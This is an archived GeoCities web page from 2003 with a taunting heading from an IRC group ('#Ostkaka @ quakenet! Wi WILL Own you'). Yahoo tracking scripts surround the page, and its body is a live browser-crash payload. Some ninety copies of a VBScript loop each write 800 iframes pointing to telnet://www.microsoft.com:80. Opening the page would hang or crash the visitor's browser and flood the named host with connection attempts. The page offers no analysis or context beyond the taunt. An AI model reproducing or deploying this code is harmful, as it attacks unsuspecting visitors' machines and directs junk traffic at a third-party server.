<script language="JavaScript">var PUpage="76001067"; var PUprop="geocities"; </script><script language="JavaScript" src="http://www.geocities.com/js_source/pu5geo.js"></script><script language="JavaScript" src="http://www.geocities.com/js_source/ygIELib9.js?v3"></script><script language="JavaScript">var yviContents='http://us.toto.geo.yahoo.com/toto?s=76001067&l=NE&b=1&t=1065878268';yviR='us';yfiEA(0);</script>
<!-- text above generated by server. PLEASE REMOVE -->

<html>
<body>
<H1> this is how it goes if you don't respect Ostkaka! Muahaha! “Û </H1>
<br> <br><b> #Ostkaka @ quakenet! Wi WILL Own you \m/“Û\m/  </b>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next

</body>
</html>

<!-- text below generated by server. PLEASE REMOVE --></object></layer></div></span></style></noscript></table></script></applet><script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script language="JavaScript" src="http://geocities.com/js_source/geov2.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.webhosting.yahoo.com/visit.gif?us1065878268" alt="setstats" border="0" width="1" height="1"></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=76001067&t=1065878268" ALT=1 WIDTH=1 HEIGHT=1>
<!-- w40.geo.scd.yahoo.com compressed/chunked Sat Oct 11 06:17:48 PDT 2003 -->
